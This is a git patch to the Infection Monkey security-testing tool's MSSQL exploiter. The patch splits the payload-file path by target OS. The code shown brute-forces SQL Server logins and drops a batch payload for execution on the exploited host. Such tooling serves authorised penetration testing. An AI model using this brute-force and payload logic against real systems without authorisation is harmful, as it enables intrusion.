From b5523a9c54dc63f9b0e7af8f457cfbcffe0d9eeb Mon Sep 17 00:00:00 2001 From: itay Date: Thu, 21 Feb 2019 16:50:02 +0200 Subject: [PATCH] fix expanding of env variables --- monkey/infection_monkey/exploit/mssqlexec.py | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index 128755de0..b34178dd6 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -17,13 +17,14 @@ class MSSQLExploiter(HostExploiter): _TARGET_OS_TYPE = ['windows'] LOGIN_TIMEOUT = 15 SQL_DEFAULT_TCP_PORT = '1433' - DEFAULT_PAYLOAD_PATH = os.path.expandvars(r'%TEMP%\~PLD123.bat') if platform.system() else '/tmp/~PLD123.bat' + DEFAULT_PAYLOAD_PATH_WIN = os.path.expandvars(r'%TEMP%\~PLD123.bat') + DEFAULT_PAYLOAD_PATH_LINUX = '/tmp/~PLD123.bat' def __init__(self, host): super(MSSQLExploiter, self).__init__(host) self.attacks_list = [mssqlexec_utils.CmdShellAttack] - def create_payload_file(self, payload_path=DEFAULT_PAYLOAD_PATH): + def create_payload_file(self, payload_path): """ This function creates dynamically the payload file to be transported and ran on the exploited machine. :param payload_path: A path to the create the payload file in @@ -45,10 +46,13 @@ class MSSQLExploiter(HostExploiter): """ username_passwords_pairs_list = self._config.get_exploit_user_password_pairs() - if not self.create_payload_file(): + payload_path = MSSQLExploiter.DEFAULT_PAYLOAD_PATH_LINUX if 'linux' in self.host.os['type'] \ + else MSSQLExploiter.DEFAULT_PAYLOAD_PATH_WIN + + if not self.create_payload_file(payload_path): return False if self.brute_force_begin(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, username_passwords_pairs_list, - self.DEFAULT_PAYLOAD_PATH): + payload_path): LOG.debug("Bruteforce was a success on host: {0}".format(self.host.ip_addr)) return True else: